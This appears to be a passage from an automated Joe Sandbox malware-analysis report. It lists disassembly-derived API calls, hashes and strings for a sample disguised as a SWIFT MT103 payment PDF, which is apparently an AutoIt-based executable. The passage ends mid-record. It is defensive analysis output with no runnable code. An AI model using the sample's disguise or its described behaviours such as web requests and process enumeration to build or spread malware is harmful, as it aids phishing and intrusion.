                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_printf
                                                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe
                                                        • API String ID: 220974073-4137380881
                                                        • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                        • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                        • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                        • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                        • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                        • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                        • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                        APIs
                                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,004A8E80,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,0040F3D2), ref: 0040FFCA
                                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                        • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                        • String ID:
                                                        • API String ID: 978794511-0
                                                        • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                        • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                        • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                        • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                        • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                        • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                        • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                        • _memset.LIBCMT ref: 00455F12
                                                        • SendMessageW.USER32 ref: 00455F43
                                                        • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                        • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                        • _wcslen.LIBCMT ref: 00455FFC
                                                        • _wcslen.LIBCMT ref: 00456018
                                                        • CharNextW.USER32(00000000,?,?,?), ref: 00456034
                                                        • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                        • String ID:
                                                        • API String ID: 2321321212-0
                                                        • Opcode ID: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                        • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                        • Opcode Fuzzy Hash: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                        • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                        APIs
                                                          • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                          • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                          • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                        • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                        • Sleep.KERNEL32(00000000), ref: 00445D70
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                        • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                        • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                        • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressProc_malloc$_strcat_strlen
                                                        • String ID: AU3_FreeVar
                                                        • API String ID: 2184576858-771828931
                                                        • Opcode ID: fbfd85354506dc7afa549e6baf05b324e9a08f04664acd55c5acbcf5b62d546c
                                                        • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                        • Opcode Fuzzy Hash: fbfd85354506dc7afa549e6baf05b324e9a08f04664acd55c5acbcf5b62d546c
                                                        • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                        • DestroyWindow.USER32(?), ref: 0042A751
                                                        • UnregisterHotKey.USER32(?), ref: 0042A778
                                                        • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 4174999648-3243417748
                                                        • Opcode ID: 2b28067674d39d842f22fc5ea792f5e1b1492a09466ba5ee58649a34086bd90e
                                                        • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                        • Opcode Fuzzy Hash: 2b28067674d39d842f22fc5ea792f5e1b1492a09466ba5ee58649a34086bd90e
                                                        • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                        • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1291720006-3916222277
                                                        • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                        • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                        • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                        • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastselect
                                                        • String ID: HH
                                                        • API String ID: 215497628-2761332787
                                                        • Opcode ID: 4a0be380e800768a3597beb2ea8bd910e826210dc0f7762801216dcf11dfa11b
                                                        • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                        • Opcode Fuzzy Hash: 4a0be380e800768a3597beb2ea8bd910e826210dc0f7762801216dcf11dfa11b
                                                        • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf__wcsicoll_wcscpy
                                                        • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                        • API String ID: 1729044348-3708979750
                                                        • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                        • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                        • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                        • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                        APIs
                                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,004A8E80,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,0040F3D2), ref: 0040FFCA
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                        • _wcscat.LIBCMT ref: 0044BCAA
                                                        • _wcslen.LIBCMT ref: 0044BCB7
                                                        • _wcslen.LIBCMT ref: 0044BCCB
                                                        • SHFileOperationW.SHELL32 ref: 0044BD16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2326526234-1173974218
                                                        • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                        • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                        • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                        • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                        APIs
                                                          • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                        • _wcslen.LIBCMT ref: 004366DD
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                        • GetLastError.KERNEL32 ref: 0043670F
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                        • _wcsrchr.LIBCMT ref: 0043674C
                                                          • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                        • String ID: \
                                                        • API String ID: 321622961-2967466578
                                                        • Opcode ID: ff574427591109c2b692cb294e430dd2cb8de0fd4eb940c88770395c73fe8636
                                                        • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                        • Opcode Fuzzy Hash: ff574427591109c2b692cb294e430dd2cb8de0fd4eb940c88770395c73fe8636
                                                        • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: e6fbfbcbdc332bc9e1c9adc977dd4728170c8002690ab54235e4039fead69224
                                                        • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                        • Opcode Fuzzy Hash: e6fbfbcbdc332bc9e1c9adc977dd4728170c8002690ab54235e4039fead69224
                                                        • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd759a2868345d6093bde8a7cf683a3aef58163a3043535f6e7aeeb399de8d4a
                                                        • Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
                                                        • Opcode Fuzzy Hash: cd759a2868345d6093bde8a7cf683a3aef58163a3043535f6e7aeeb399de8d4a
                                                        • Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
                                                        APIs
                                                        • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                        • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                        • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                        • __wsplitpath.LIBCMT ref: 00436FA0
                                                        • _wcscat.LIBCMT ref: 00436FB2
                                                        • __wcsicoll.LIBCMT ref: 00436FC4
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                        • String ID:
                                                        • API String ID: 2903788889-0
                                                        • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                        • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                        • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                        • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                        APIs
                                                        • DeleteObject.GDI32(?), ref: 0044157D
                                                        • GetDC.USER32(00000000), ref: 00441585
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                        Memory Dump Source
